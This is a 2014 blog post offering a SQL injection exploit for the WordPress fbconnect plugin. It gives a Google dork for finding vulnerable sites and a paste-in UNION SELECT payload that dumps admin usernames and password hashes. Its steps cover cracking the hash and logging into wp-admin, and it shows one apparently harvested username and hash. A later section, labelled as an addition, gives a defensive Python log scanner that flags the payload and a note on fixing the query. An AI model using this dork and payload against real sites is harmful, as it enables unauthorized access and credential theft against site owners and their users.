Monday, 10 March 2014

Exploit WordPress: fbconnect SQL Injection Vulnerability







Hey guys, today I'm going to share an exploit in WordPress that lets you get the admin's username and password (encrypted).

Finding Vulnerable Target

Dork: inurl:"fbconnect_action=myhome" 

Exploit: 

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

1- Copy the dork and paste it on Google

2- Choose any site and you will see something like this or similar,





Exploiting Target

1- Let's say your target URL is like this:

http://www.site.com/?fbconnect_action=myhome&userid=3

Paste the exploit after the URL, so it looks like this:

http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

2- So there you go, you have the username and the password. But don't forget to decrypt it first ;)




user:password

So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.

3- After you have successfully decrypted the password, you can log in to the website at

www.site.com/wp-login.php

or

www.site.com/wp-admin
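
Seen from the site owner's side, the request above stands out in the web server's access log, because a normal fbconnect user id is a plain integer. The following is an added example, not part of the original post: a small log check that flags fbconnect_action=myhome requests whose id parameter is not numeric. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens taken from the payload shown in the post, matched after URL decoding
SQL_TOKENS_RE = re.compile(r"\b(?:union|select|concat|from)\b|--|0x[0-9a-f]+", re.I)
ID_PARAMS = ("fbuserid", "userid")  # both parameter names appear in the post

def classify(line):
    """Return None for a normal request, else 'sql-tokens' or 'non-numeric-id'."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs decodes '+' and %xx, so encoded payloads are compared in clear form
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "myhome" not in params.get("fbconnect_action", []):
        return None
    verdict = None
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # a legitimate user id is a plain integer
            if SQL_TOKENS_RE.search(value):
                return "sql-tokens"
            verdict = "non-numeric-id"
    return verdict

def scan(lines):
    """Return (client_ip, verdict) for every flagged log line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample lines using documentation IP ranges, not real traffic
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2014:10:01:02 +0000] "GET /?fbconnect_action=myhome&userid=3 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Mar/2014:10:02:11 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 6230',
    '192.0.2.44 - - [10/Mar/2014:10:03:40 +0000] "GET /?fbconnect_action=myhome&fbuserid=abc HTTP/1.1" 200 4980',
    '203.0.113.7 - - [10/Mar/2014:10:04:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A hit in the log is detection only; the fix belongs in the plugin, which should treat the id as an integer or pass it through `$wpdb->prepare()` before it reaches the query.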